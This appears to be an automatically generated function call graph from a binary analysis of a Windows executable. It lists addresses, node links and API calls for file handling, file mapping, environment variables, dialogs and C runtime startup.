26929->26928 26929->26933 26936 7ff7e1dbf9d0 26929->26936 26930->26933 27678 7ff7e1dd612c 137 API calls 3 library calls 26930->27678 26931->26933 27677 7ff7e1dbdd08 179 API calls 26931->27677 26932 7ff7e1de2320 _handle_error 8 API calls 26934 7ff7e1dc11c4 26932->26934 26933->26932 26934->26799 26936->26933 27544 7ff7e1db9bb0 26936->27544 26939 7ff7e1dbfad6 27557 7ff7e1dc5ef8 26939->27557 26942 7ff7e1dbfb7a 27101 7ff7e1dc2aa0 101 API calls 26942->27101 26944 7ff7e1dbfb5e 26944->26942 27631 7ff7e1dc7c94 47 API calls 2 library calls 26944->27631 26946 7ff7e1dbfcc7 26947 7ff7e1dbfd14 26949 7ff7e1dbfbd7 26949->26946 26949->26947 26955 7ff7e1db20b0 33 API calls 26949->26955 26955->26946 27101->26949 27103 7ff7e1db2c88 27102->27103 27104 7ff7e1db2c74 27102->27104 27105 7ff7e1db1fa0 31 API calls 27103->27105 27104->27103 27765 7ff7e1db2d80 108 API calls _invalid_parameter_noinfo_noreturn 27104->27765 27108 7ff7e1db2ca1 27105->27108 27109 7ff7e1db2d64 27108->27109 27766 7ff7e1db3090 31 API calls _invalid_parameter_noinfo_noreturn 27108->27766 27111 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 27109->27111 27110 7ff7e1db2d08 27767 7ff7e1db3090 31 API calls _invalid_parameter_noinfo_noreturn 27110->27767 27113 7ff7e1db2d7c 27111->27113 27114 7ff7e1db2d14 27115 7ff7e1db1fa0 31 API calls 27114->27115 27116 7ff7e1db2d20 27115->27116 27768 7ff7e1dc878c 27116->27768 27122->26796 27123->26806 27124 7ff7e1dd0994 83 API calls _handle_error 27124->26799 27142 7ff7e1dc56a4 27125->27142 27127 7ff7e1db91df 27145 7ff7e1dcb788 27127->27145 27131 7ff7e1db9383 27131->26859 27133 7ff7e1dc4d32 memcpy_s 27132->27133 27160 7ff7e1dc4bac 27133->27160 27135 7ff7e1dc4d54 27136 7ff7e1dc4d90 27135->27136 27139 7ff7e1dc4dae 27135->27139 27137 7ff7e1de2320 _handle_error 8 API calls 27136->27137 27138 7ff7e1db2b32 27137->27138 27138->26782 27138->26862 27140 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 27139->27140 27141 7ff7e1dc4db3 27140->27141 27151 7ff7e1dc56e8 27142->27151 27146 7ff7e1db13a4 33 API calls 27145->27146 27147 7ff7e1db9365 27146->27147 27148 7ff7e1db9a28 27147->27148 27149 7ff7e1dc56e8 2 API calls 27148->27149 27150 7ff7e1db9a36 27149->27150 27150->27131 27152 7ff7e1dc56fe memcpy_s 27151->27152 27155 7ff7e1dceba4 27152->27155 27158 7ff7e1dceb58 GetCurrentProcess GetProcessAffinityMask 27155->27158 27159 7ff7e1dc56de 27158->27159 27159->27127 27161 7ff7e1dc4c27 27160->27161 27163 7ff7e1dc4c2f BuildCatchObjectHelperInternal 27160->27163 27162 7ff7e1db1fa0 31 API calls 27161->27162 27162->27163 27163->27135 27165 7ff7e1dc24fd CreateFileW 27164->27165 27167 7ff7e1dc25ae GetLastError 27165->27167 27176 7ff7e1dc266e 27165->27176 27168 7ff7e1dc6a0c 49 API calls 27167->27168 27169 7ff7e1dc25dc 27168->27169 27170 7ff7e1dc25e0 CreateFileW GetLastError 27169->27170 27175 7ff7e1dc262c 27169->27175 27170->27175 27171 7ff7e1dc26b1 SetFileTime 27174 7ff7e1dc26cf 27171->27174 27172 7ff7e1dc2708 27173 7ff7e1de2320 _handle_error 8 API calls 27172->27173 27177 7ff7e1dc271b 27173->27177 27174->27172 27178 7ff7e1db20b0 33 API calls 27174->27178 27175->27176 27179 7ff7e1dc2736 27175->27179 27176->27171 27176->27174 27177->26864 27182 7ff7e1dbb7e8 99 API calls 2 library calls 27177->27182 27178->27172 27180 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 27179->27180 27181 7ff7e1dc273b 27180->27181 27182->26864 27184 7ff7e1dc28f6 27183->27184 27186 7ff7e1dc28fd 27183->27186 27184->26869 27185 7ff7e1dc2320 GetStdHandle ReadFile GetLastError GetLastError GetFileType 27185->27186 27186->27184 27186->27185 27204 7ff7e1dbb8a4 99 API calls std::_Xinvalid_argument 27186->27204 27189 7ff7e1dc2bcd 27188->27189 27191 7ff7e1dc2be9 27188->27191 27190 7ff7e1db34cc 27189->27190 27205 7ff7e1dbb9c4 99 API calls std::_Xinvalid_argument 27189->27205 27190->26890 27191->27190 27193 7ff7e1dc2c01 SetFilePointer 27191->27193 27193->27190 27194 7ff7e1dc2c1e GetLastError 27193->27194 27194->27190 27195 7ff7e1dc2c28 27194->27195 27195->27190 27206 7ff7e1dbb9c4 99 API calls std::_Xinvalid_argument 27195->27206 27207 7ff7e1dc2778 27197->27207 27200 7ff7e1db35a7 27200->26877 27200->26893 27202->26879 27203->26878 27208 7ff7e1dc2789 _snwprintf 27207->27208 27210 7ff7e1dc2890 SetFilePointer 27208->27210 27213 7ff7e1dc27b5 27208->27213 27209 7ff7e1de2320 _handle_error 8 API calls 27211 7ff7e1dc281d 27209->27211 27212 7ff7e1dc28b8 GetLastError 27210->27212 27210->27213 27211->27200 27214 7ff7e1dbb9c4 99 API calls std::_Xinvalid_argument 27211->27214 27212->27213 27213->27209 27216 7ff7e1db3396 27215->27216 27217 7ff7e1db339a 27215->27217 27216->26905 27216->26906 27221 7ff7e1db3294 27217->27221 27220 7ff7e1dc2aa0 101 API calls 27220->27216 27222 7ff7e1db32bb 27221->27222 27224 7ff7e1db32f6 27221->27224 27223 7ff7e1db69f8 132 API calls 27222->27223 27227 7ff7e1db32db 27223->27227 27229 7ff7e1db6e74 27224->27229 27227->27220 27231 7ff7e1db6e95 27229->27231 27230 7ff7e1db69f8 132 API calls 27230->27231 27231->27230 27233 7ff7e1db331d 27231->27233 27261 7ff7e1dce808 27231->27261 27233->27227 27234 7ff7e1db3904 27233->27234 27269 7ff7e1db6a7c 27234->27269 27237 7ff7e1db396a 27240 7ff7e1db3989 27237->27240 27241 7ff7e1db399a 27237->27241 27238 7ff7e1db3a8a 27242 7ff7e1de2320 _handle_error 8 API calls 27238->27242 27302 7ff7e1dd0d54 33 API calls 27240->27302 27246 7ff7e1db39a3 27241->27246 27247 7ff7e1db39ec 27241->27247 27245 7ff7e1db3a9e 27242->27245 27243 7ff7e1db3ab3 27248 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 27243->27248 27245->27227 27303 7ff7e1dd0c80 33 API calls 27246->27303 27304 7ff7e1db26b4 33 API calls BuildCatchObjectHelperInternal 27247->27304 27251 7ff7e1db3ab8 27248->27251 27255 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 27251->27255 27252 7ff7e1db39b0 27256 7ff7e1db1fa0 31 API calls 27252->27256 27259 7ff7e1db39c0 BuildCatchObjectHelperInternal 27252->27259 27253 7ff7e1db1fa0 31 API calls 27260 7ff7e1db394f 27253->27260 27254 7ff7e1db3a13 27305 7ff7e1dd0ae8 34 API calls _invalid_parameter_noinfo_noreturn 27254->27305 27258 7ff7e1db3abe 27255->27258 27256->27259 27259->27253 27260->27238 27260->27243 27260->27251 27262 7ff7e1dce811 27261->27262 27263 7ff7e1dce82b 27262->27263 27267 7ff7e1dbb664 RtlPcToFileHeader RaiseException std::_Xinvalid_argument 27262->27267 27265 7ff7e1dce845 SetThreadExecutionState 27263->27265 27268 7ff7e1dbb664 RtlPcToFileHeader RaiseException std::_Xinvalid_argument 27263->27268 27267->27263 27268->27265 27270 7ff7e1db6a96 _snwprintf 27269->27270 27271 7ff7e1db6ae4 27270->27271 27272 7ff7e1db6ac4 27270->27272 27274 7ff7e1db6d4d 27271->27274 27277 7ff7e1db6b0f 27271->27277 27344 7ff7e1db28a4 82 API calls 2 library calls 27272->27344 27373 7ff7e1db28a4 82 API calls 2 library calls 27274->27373 27276 7ff7e1db6ad0 27278 7ff7e1de2320 _handle_error 8 API calls 27276->27278 27277->27276 27306 7ff7e1dd1f94 27277->27306 27279 7ff7e1db394b 27278->27279 27279->27237 27279->27260 27301 7ff7e1db2794 33 API calls __std_swap_ranges_trivially_swappable 27279->27301 27282 7ff7e1db6b85 27283 7ff7e1db6c2a 27282->27283 27300 7ff7e1db6b7b 27282->27300 27350 7ff7e1dc8968 109 API calls 27282->27350 27315 7ff7e1dc4760 27283->27315 27284 7ff7e1db6b80 27284->27282 27346 7ff7e1db40b0 27284->27346 27285 7ff7e1db6b6e 27345 7ff7e1db28a4 82 API calls 2 library calls 27285->27345 27291 7ff7e1db6c52 27292 7ff7e1db6cd1 27291->27292 27293 7ff7e1db6cc7 27291->27293 27351 7ff7e1dd1f20 27292->27351 27319 7ff7e1dc1794 27293->27319 27296 7ff7e1db6ccf 27371 7ff7e1dc4700 8 API calls _handle_error 27296->27371 27298 7ff7e1db6cfd 27298->27300 27372 7ff7e1db433c 82 API calls 2 library calls 27298->27372 27334 7ff7e1dd1870 27300->27334 27301->27237 27302->27260 27303->27252 27304->27254 27305->27260 27307 7ff7e1dd2056 std::bad_alloc::bad_alloc 27306->27307 27310 7ff7e1dd1fc5 std::bad_alloc::bad_alloc 27306->27310 27374 7ff7e1de4078 27307->27374 27308 7ff7e1db6b59 27308->27282 27308->27284 27308->27285 27310->27308 27311 7ff7e1de4078 std::_Xinvalid_argument 2 API calls 27310->27311 27312 7ff7e1dd200f std::bad_alloc::bad_alloc 27310->27312 27311->27312 27312->27308 27313 7ff7e1de4078 std::_Xinvalid_argument 2 API calls 27312->27313 27314 7ff7e1dd20a9 27313->27314 27316 7ff7e1dc4780 27315->27316 27318 7ff7e1dc478a 27315->27318 27317 7ff7e1de21d0 33 API calls 27316->27317 27317->27318 27318->27291 27320 7ff7e1dc17be memcpy_s 27319->27320 27379 7ff7e1dc8a48 27320->27379 27322 7ff7e1dc1856 27322->27296 27323 7ff7e1dc17f2 27325 7ff7e1dc8a48 146 API calls 27323->27325 27326 7ff7e1dc1830 27323->27326 27389 7ff7e1dc8c4c 27323->27389 27325->27323 27326->27322 27327 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 27326->27327 27330 7ff7e1dc1882 27327->27330 27335 7ff7e1dd188e 27334->27335 27337 7ff7e1dd18a1 27335->27337 27399 7ff7e1dce948 27335->27399 27339 7ff7e1dd18d8 27337->27339 27395 7ff7e1de236c 27337->27395 27343 7ff7e1dd1a37 27339->27343 27406 7ff7e1dca984 31 API calls _invalid_parameter_noinfo_noreturn 27339->27406 27340 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 27341 7ff7e1dd1ad0 27340->27341 27343->27340 27344->27276 27345->27300 27347 7ff7e1db40dd 27346->27347 27349 7ff7e1db40d7 memcpy_s 27346->27349 27347->27349 27407 7ff7e1db4120 33 API calls 2 library calls 27347->27407 27349->27282 27350->27283 27352 7ff7e1dd1f29 27351->27352 27353 7ff7e1dd1f55 27352->27353 27354 7ff7e1dd1f5d 27352->27354 27355 7ff7e1dd1f49 27352->27355 27429 7ff7e1dd3964 151 API calls 27353->27429 27354->27296 27408 7ff7e1dd20ac 27355->27408 27358 7ff7e1dc8a48 146 API calls 27363 7ff7e1dd4733 BuildCatchObjectHelperInternal 27358->27363 27359 7ff7e1dd4ad7 27418 7ff7e1dd3484 27359->27418 27363->27358 27363->27359 27412 7ff7e1dce9dc 27363->27412 27430 7ff7e1dd2ab0 146 API calls 27363->27430 27431 7ff7e1dd4b98 146 API calls 27363->27431 27432 7ff7e1dcecd8 27363->27432 27436 7ff7e1dd23a0 113 API calls 27363->27436 27437 7ff7e1dd53f0 151 API calls 27363->27437 27371->27298 27372->27300 27373->27276 27375 7ff7e1de40b4 RtlPcToFileHeader 27374->27375 27376 7ff7e1de4097 27374->27376 27377 7ff7e1de40cc 27375->27377 27378 7ff7e1de40db RaiseException 27375->27378 27376->27375 27377->27378 27378->27310 27381 7ff7e1dc8bcd 27379->27381 27386 7ff7e1dc8a91 BuildCatchObjectHelperInternal 27379->27386 27380 7ff7e1dc8c1a 27382 7ff7e1dce808 SetThreadExecutionState RtlPcToFileHeader RaiseException 27380->27382 27381->27380 27383 7ff7e1dba174 8 API calls 27381->27383 27385 7ff7e1dc8c1f 27382->27385 27383->27380 27384 7ff7e1dd612c 137 API calls 27384->27386 27385->27323 27386->27381 27386->27384 27386->27385 27387 7ff7e1dc4888 108 API calls 27386->27387 27388 7ff7e1dc28d0 104 API calls 27386->27388 27387->27386 27388->27386 27390 7ff7e1dc8c72 BuildCatchObjectHelperInternal 27389->27390 27391 7ff7e1dc8c8b 27389->27391 27393 7ff7e1dc8cb9 27390->27393 27394 7ff7e1dc4888 108 API calls 27390->27394 27391->27390 27392 7ff7e1dc2ce0 104 API calls 27391->27392 27392->27390 27394->27393 27396 7ff7e1de239f 27395->27396 27397 7ff7e1de23c8 27396->27397 27398 7ff7e1dd1870 108 API calls 27396->27398 27397->27339 27398->27396 27400 7ff7e1dcecd8 103 API calls 27399->27400 27401 7ff7e1dce95f ReleaseSemaphore 27400->27401 27402 7ff7e1dce9a3 DeleteCriticalSection CloseHandle CloseHandle 27401->27402 27403 7ff7e1dce984 27401->27403 27404 7ff7e1dcea5c 101 API calls 27403->27404 27405 7ff7e1dce98e FindCloseChangeNotification 27404->27405 27405->27402 27405->27403 27406->27343 27410 7ff7e1dd20c8 memcpy_s 27408->27410 27409 7ff7e1dd21ba 27409->27363 27410->27409 27411 7ff7e1dbb75c 82 API calls 27410->27411 27411->27410 27413 7ff7e1dcea02 27412->27413 27414 7ff7e1dce9fd 27412->27414 27429->27354 27430->27363 27431->27363 27433 7ff7e1dced19 27432->27433 27434 7ff7e1dcecea ResetEvent ReleaseSemaphore 27432->27434 27433->27363 27436->27363 27437->27363 27439 7ff7e1dc8882 27438->27439 27440 7ff7e1dc8892 27438->27440 27445 7ff7e1dc23f0 27439->27445 27440->26912 27443 7ff7e1de2320 _handle_error 8 API calls 27442->27443 27444 7ff7e1dbf7dc 27443->27444 27444->26799 27444->27124 27446 7ff7e1dc240f 27445->27446 27449 7ff7e1dc2aa0 101 API calls 27446->27449 27447 7ff7e1dc2428 27450 7ff7e1dc2bb0 101 API calls 27447->27450 27448 7ff7e1dc2438 27448->27440 27449->27447 27450->27448 27452 7ff7e1db5e67 27451->27452 27515 7ff7e1dc85f0 27452->27515 27454 7ff7e1db6134 27525 7ff7e1db6fcc 82 API calls 27454->27525 27456 7ff7e1db69af 27457 7ff7e1de2320 _handle_error 8 API calls 27456->27457 27460 7ff7e1db69c3 27457->27460 27458 7ff7e1db69e4 27463 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 27458->27463 27459 7ff7e1db6973 27538 7ff7e1db466c 82 API calls 27459->27538 27460->26921 27462 7ff7e1db612e 27462->27454 27462->27459 27465 7ff7e1dc85f0 104 API calls 27462->27465 27464 7ff7e1db69e9 27463->27464 27466 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 27464->27466 27467 7ff7e1db61a4 27465->27467 27468 7ff7e1db69ef 27466->27468 27467->27454 27471 7ff7e1db61ac 27467->27471 27469 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 27468->27469 27470 7ff7e1db69f5 27469->27470 27472 7ff7e1db623f 27471->27472 27526 7ff7e1db466c 82 API calls 27471->27526 27472->27459 27474 7ff7e1db6266 27472->27474 27477 7ff7e1db68b7 27474->27477 27478 7ff7e1db62ce 27474->27478 27480 7ff7e1dc4d04 31 API calls 27477->27480 27479 7ff7e1db6481 27478->27479 27482 7ff7e1db62e0 27478->27482 27530 7ff7e1dc4c74 33 API calls 27479->27530 27485 7ff7e1db68c6 27480->27485 27483 7ff7e1db4228 33 API calls 27482->27483 27495 7ff7e1db638f 27482->27495 27509 7ff7e1db613c 27482->27509 27485->27509 27509->27456 27509->27458 27509->27468 27513->26921 27516 7ff7e1dc8614 27515->27516 27517 7ff7e1dc869a 27515->27517 27518 7ff7e1db40b0 33 API calls 27516->27518 27522 7ff7e1dc867c 27516->27522 27519 7ff7e1db40b0 33 API calls 27517->27519 27517->27522 27520 7ff7e1dc864d 27518->27520 27521 7ff7e1dc86b3 27519->27521 27539 7ff7e1dba174 27520->27539 27524 7ff7e1dc28d0 104 API calls 27521->27524 27522->27462 27524->27522 27525->27509 27540 7ff7e1dba185 27539->27540 27541 7ff7e1dba19a 27540->27541 27543 7ff7e1dcaf18 8 API calls 2 library calls 27540->27543 27541->27522 27543->27541 27552 7ff7e1db9be7 27544->27552 27545 7ff7e1db9c1b 27546 7ff7e1de2320 _handle_error 8 API calls 27545->27546 27547 7ff7e1db9c9d 27546->27547 27547->26939 27549 7ff7e1db9c83 27551 7ff7e1db1fa0 31 API calls 27549->27551 27551->27545 27552->27545 27552->27549 27553 7ff7e1db9cae 27552->27553 27679 7ff7e1dc5294 27552->27679 27697 7ff7e1dcdb60 27552->27697 27554 7ff7e1db9cbf 27553->27554 27701 7ff7e1dcda48 CompareStringW 27553->27701 27554->27549 27556 7ff7e1db20b0 33 API calls 27554->27556 27556->27549 27570 7ff7e1dc5f3a 27557->27570 27558 7ff7e1de2320 _handle_error 8 API calls 27559 7ff7e1dbfb29 27558->27559 27559->26942 27630 7ff7e1dc7c94 47 API calls 2 library calls 27559->27630 27561 7ff7e1db129c 33 API calls 27563 7ff7e1dc6129 27561->27563 27562 7ff7e1dc61d4 27564 7ff7e1db1fa0 31 API calls 27563->27564 27565 7ff7e1dc613b BuildCatchObjectHelperInternal 27563->27565 27564->27565 27566 7ff7e1dc619b 27565->27566 27567 7ff7e1dc61c9 27565->27567 27566->27558 27568 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 27567->27568 27569 7ff7e1dc61ce 27568->27569 27705 7ff7e1db704c 47 API calls BuildCatchObjectHelperInternal 27569->27705 27570->27561 27570->27566 27570->27569 27629->26929 27630->26944 27631->26942 27677->26933 27678->26933 27680 7ff7e1dc52d4 27679->27680 27685 7ff7e1dc5312 __vcrt_FlsAlloc 27680->27685 27686 7ff7e1dc5339 __vcrt_FlsAlloc 27680->27686 27702 7ff7e1dd13f4 CompareStringW 27680->27702 27681 7ff7e1de2320 _handle_error 8 API calls 27682 7ff7e1dc5503 27681->27682 27682->27552 27685->27686 27687 7ff7e1dc5382 __vcrt_FlsAlloc 27685->27687 27703 7ff7e1dd13f4 CompareStringW 27685->27703 27686->27681 27687->27686 27688 7ff7e1dc5439 27687->27688 27689 7ff7e1db129c 33 API calls 27687->27689 27691 7ff7e1dc551b 27688->27691 27692 7ff7e1dc5489 27688->27692 27690 7ff7e1dc5426 27689->27690 27693 7ff7e1dc72cc 8 API calls 27690->27693 27694 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 27691->27694 27692->27686 27704 7ff7e1dd13f4 CompareStringW 27692->27704 27693->27688 27696 7ff7e1dc5520 27694->27696 27699 7ff7e1dcdb73 27697->27699 27698 7ff7e1dcdb91 27698->27552 27699->27698 27700 7ff7e1db20b0 33 API calls 27699->27700 27700->27698 27701->27554 27702->27685 27703->27687 27704->27686 27705->27562 27765->27103 27766->27110 27767->27114 27769 7ff7e1dc87af 27768->27769 27770 7ff7e1dc87df 27768->27770 27771 7ff7e1de236c 108 API calls 27769->27771 27772 7ff7e1de236c 108 API calls 27770->27772 27780 7ff7e1dc882b 27770->27780 27774 7ff7e1dc87ca 27771->27774 27776 7ff7e1dc8814 27772->27776 27775 7ff7e1de236c 108 API calls 27774->27775 27775->27770 27778 7ff7e1de236c 108 API calls 27776->27778 27777 7ff7e1dc8845 27779 7ff7e1dc461c 108 API calls 27777->27779 27778->27780 27781 7ff7e1dc8851 27779->27781 27782 7ff7e1dc461c 27780->27782 27783 7ff7e1dc4632 27782->27783 27785 7ff7e1dc463a 27782->27785 27784 7ff7e1dce948 108 API calls 27783->27784 27784->27785 27785->27777 27787 7ff7e1dc163e 27786->27787 27793 7ff7e1dc1681 27786->27793 27790 7ff7e1dc31bc 51 API calls 27787->27790 27787->27793 27788 7ff7e1db1fa0 31 API calls 27788->27793 27789 7ff7e1dbe600 31 API calls 27791 7ff7e1dc16de 27789->27791 27790->27787 27792 7ff7e1dc175b 27791->27792 27796 7ff7e1dc178d 27791->27796 27794 7ff7e1de2320 _handle_error 8 API calls 27792->27794 27793->27788 27795 7ff7e1dc16a0 27793->27795 27797 7ff7e1dbe58a 27794->27797 27795->27789 27798 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 27796->27798 27797->26737 27797->26738 27799 7ff7e1dc1792 27798->27799 27801 7ff7e1dd84cc 4 API calls 27800->27801 27802 7ff7e1dd84aa 27801->27802 27803 7ff7e1dd84b9 27802->27803 27812 7ff7e1dd8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27802->27812 27803->26090 27803->26091 27805->26096 27806->26102 27808 7ff7e1dd84de 27807->27808 27809 7ff7e1dd84e3 27807->27809 27813 7ff7e1dd8590 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27808->27813 27809->26102 27811->26105 27812->27803 27813->27809 27814->26126 27816->26154 27817->26171 27818->26178 27820->26183 27881 7ff7e1de1491 27882 7ff7e1de13c9 27881->27882 27883 7ff7e1de1900 _com_raise_error 14 API calls 27882->27883 27883->27882 27941 7ff7e1de2d6c 27966 7ff7e1de27fc 27941->27966 27944 7ff7e1de2eb8 28064 7ff7e1de3170 7 API calls 2 library calls 27944->28064 27945 7ff7e1de2d88 __scrt_acquire_startup_lock 27947 7ff7e1de2ec2 27945->27947 27950 7ff7e1de2da6 27945->27950 28065 7ff7e1de3170 7 API calls 2 library calls 27947->28065 27949 7ff7e1de2ecd abort 27951 7ff7e1de2dcb 27950->27951 27956 7ff7e1de2de8 __scrt_release_startup_lock 27950->27956 27974 7ff7e1decd90 27950->27974 27953 7ff7e1de2e51 27978 7ff7e1de32bc 27953->27978 27955 7ff7e1de2e56 27981 7ff7e1decd20 27955->27981 27956->27953 28061 7ff7e1dec050 35 API calls __GSHandlerCheck_EH 27956->28061 28066 7ff7e1de2fb0 27966->28066 27969 7ff7e1de282b 28068 7ff7e1decc50 27969->28068 27973 7ff7e1de2827 27973->27944 27973->27945 27975 7ff7e1decdeb 27974->27975 27976 7ff7e1decdcc 27974->27976 27975->27956 27976->27975 28085 7ff7e1db1120 27976->28085 27979 7ff7e1de3cf0 memcpy_s 27978->27979 27980 7ff7e1de32d3 GetStartupInfoW 27979->27980 27980->27955 28091 7ff7e1df0730 27981->28091 27983 7ff7e1decd2f 27984 7ff7e1de2e5e 27983->27984 28095 7ff7e1df0ac0 35 API calls _snwprintf 27983->28095 27986 7ff7e1de0754 27984->27986 28097 7ff7e1dcdfd0 27986->28097 27989 7ff7e1dc62dc 35 API calls 27990 7ff7e1de079a 27989->27990 28174 7ff7e1dd946c 27990->28174 27992 7ff7e1de07a4 memcpy_s 28179 7ff7e1dd9a14 27992->28179 27994 7ff7e1de0ddc 27996 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 27994->27996 27995 7ff7e1de096e GetCommandLineW 27998 7ff7e1de0980 27995->27998 27999 7ff7e1de0b42 27995->27999 27997 7ff7e1de0de2 27996->27997 28002 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 27997->28002 28004 7ff7e1db129c 33 API calls 27998->28004 28001 7ff7e1dc6454 34 API calls 27999->28001 28000 7ff7e1de0819 28000->27994 28000->27995 28003 7ff7e1de0b51 28001->28003 28014 7ff7e1de0de8 28002->28014 28007 7ff7e1db1fa0 31 API calls 28003->28007 28011 7ff7e1de0b68 BuildCatchObjectHelperInternal 28003->28011 28006 7ff7e1de09a5 28004->28006 28005 7ff7e1db1fa0 31 API calls 28008 7ff7e1de0b93 SetEnvironmentVariableW GetLocalTime 28005->28008 28220 7ff7e1ddcad0 102 API calls 3 library calls 28006->28220 28007->28011 28012 7ff7e1dc3e28 swprintf 46 API calls 28008->28012 28010 7ff7e1de1900 _com_raise_error 14 API calls 28010->28014 28011->28005 28015 7ff7e1de0c18 SetEnvironmentVariableW GetModuleHandleW LoadIconW 28012->28015 28013 7ff7e1de09af 28013->27997 28017 7ff7e1de0adb 28013->28017 28018 7ff7e1de09f9 OpenFileMappingW 28013->28018 28014->28010 28189 7ff7e1ddb014 LoadBitmapW 28015->28189 28026 7ff7e1db129c 33 API calls 28017->28026 28020 7ff7e1de0ad0 CloseHandle 28018->28020 28021 7ff7e1de0a19 MapViewOfFile 28018->28021 28020->27999 28021->28020 28023 7ff7e1de0a3f UnmapViewOfFile MapViewOfFile 28021->28023 28023->28020 28024 7ff7e1de0a71 28023->28024 28221 7ff7e1dda190 33 API calls 2 library calls 28024->28221 28025 7ff7e1de0c75 28213 7ff7e1dd67b4 28025->28213 28027 7ff7e1de0b00 28026->28027 28225 7ff7e1ddfd0c 35 API calls 2 library calls 28027->28225 28031 7ff7e1de0a81 28222 7ff7e1ddfd0c 35 API calls 2 library calls 28031->28222 28033 7ff7e1de0b0a 28033->27999 28039 7ff7e1de0dd7 28033->28039 28035 7ff7e1dd67b4 33 API calls 28037 7ff7e1de0c87 DialogBoxParamW 28035->28037 28036 7ff7e1de0a90 28223 7ff7e1dcb9b4 102 API calls 28036->28223 28044 7ff7e1de0cd3 28037->28044 28042 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 28039->28042 28040 7ff7e1de0aa5 28224 7ff7e1dcbb00 102 API calls 28040->28224 28042->27994 28043 7ff7e1de0ab8 28048 7ff7e1de0ac7 UnmapViewOfFile 28043->28048 28045 7ff7e1de0ce6 Sleep 28044->28045 28046 7ff7e1de0cec 28044->28046 28045->28046 28047 7ff7e1de0cfa 28046->28047 28226 7ff7e1dd9f4c 49 API calls 2 library calls 28046->28226 28050 7ff7e1de0d06 DeleteObject 28047->28050 28048->28020 28051 7ff7e1de0d25 28050->28051 28052 7ff7e1de0d1f DeleteObject 28050->28052 28053 7ff7e1de0d5b 28051->28053 28057 7ff7e1de0d6d 28051->28057 28052->28051 28227 7ff7e1ddfe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 28053->28227 28056 7ff7e1de0d60 CloseHandle 28056->28057 28216 7ff7e1dd94e4 28057->28216 28061->27953 28064->27947 28065->27949 28067 7ff7e1de281e __scrt_dllmain_crt_thread_attach 28066->28067 28067->27969 28067->27973 28069 7ff7e1df0d4c 28068->28069 28070 7ff7e1de2830 28069->28070 28073 7ff7e1deec00 28069->28073 28070->27973 28072 7ff7e1de51a0 7 API calls 2 library calls 28070->28072 28072->27973 28084 7ff7e1def398 EnterCriticalSection 28073->28084 28086 7ff7e1db91c8 35 API calls 28085->28086 28087 7ff7e1db1130 28086->28087 28090 7ff7e1de29bc 34 API calls 28087->28090 28089 7ff7e1de2a01 28089->27976 28090->28089 28092 7ff7e1df073d 28091->28092 28094 7ff7e1df0749 28091->28094 28096 7ff7e1df0570 48 API calls 4 library calls 28092->28096 28094->27983 28095->27983 28096->28094 28228 7ff7e1de2450 28097->28228 28100 7ff7e1dce026 GetProcAddress 28103 7ff7e1dce053 GetProcAddress 28100->28103 28104 7ff7e1dce03b 28100->28104 28101 7ff7e1dce07b 28102 7ff7e1dce503 28101->28102 28235 7ff7e1deb788 39 API calls 2 library calls 28101->28235 28106 7ff7e1dc6454 34 API calls 28102->28106 28103->28101 28107 7ff7e1dce068 28103->28107 28104->28103 28109 7ff7e1dce50c 28106->28109 28107->28101 28108 7ff7e1dce3b0 28108->28102 28110 7ff7e1dce3ba 28108->28110 28111 7ff7e1dc7df4 47 API calls 28109->28111 28112 7ff7e1dc6454 34 API calls 28110->28112 28138 7ff7e1dce51a 28111->28138 28113 7ff7e1dce3c3 CreateFileW 28112->28113 28115 7ff7e1dce403 SetFilePointer 28113->28115 28116 7ff7e1dce4f0 CloseHandle 28113->28116 28115->28116 28117 7ff7e1dce41c ReadFile 28115->28117 28118 7ff7e1db1fa0 31 API calls 28116->28118 28117->28116 28119 7ff7e1dce444 28117->28119 28118->28102 28120 7ff7e1dce800 28119->28120 28121 7ff7e1dce458 28119->28121 28241 7ff7e1de2624 8 API calls 28120->28241 28126 7ff7e1db129c 33 API calls 28121->28126 28123 7ff7e1dce805 28124 7ff7e1dce53e CompareStringW 28124->28138 28125 7ff7e1db129c 33 API calls 28125->28138 28131 7ff7e1dce48f 28126->28131 28127 7ff7e1dc8090 47 API calls 28127->28138 28129 7ff7e1dce63a 28132 7ff7e1dce7c2 28129->28132 28133 7ff7e1dce648 28129->28133 28130 7ff7e1db1fa0 31 API calls 28130->28138 28135 7ff7e1dce4db 28131->28135 28236 7ff7e1dcd0a0 33 API calls 28131->28236 28137 7ff7e1db1fa0 31 API calls 28132->28137 28237 7ff7e1dc7eb0 47 API calls 28133->28237 28134 7ff7e1dc32bc 51 API calls 28134->28138 28139 7ff7e1db1fa0 31 API calls 28135->28139 28141 7ff7e1dce7cb 28137->28141 28138->28124 28138->28125 28138->28127 28138->28130 28138->28134 28158 7ff7e1dce5cc 28138->28158 28230 7ff7e1dc51a4 28138->28230 28142 7ff7e1dce4e5 28139->28142 28140 7ff7e1dce651 28143 7ff7e1dc51a4 9 API calls 28140->28143 28145 7ff7e1db1fa0 31 API calls 28141->28145 28146 7ff7e1db1fa0 31 API calls 28142->28146 28147 7ff7e1dce656 28143->28147 28144 7ff7e1db129c 33 API calls 28144->28158 28148 7ff7e1dce7d5 28145->28148 28146->28116 28149 7ff7e1dce706 28147->28149 28159 7ff7e1dce661 28147->28159 28151 7ff7e1de2320 _handle_error 8 API calls 28148->28151 28152 7ff7e1dcda98 48 API calls 28149->28152 28150 7ff7e1dc8090 47 API calls 28150->28158 28153 7ff7e1dce7e4 28151->28153 28154 7ff7e1dce74b 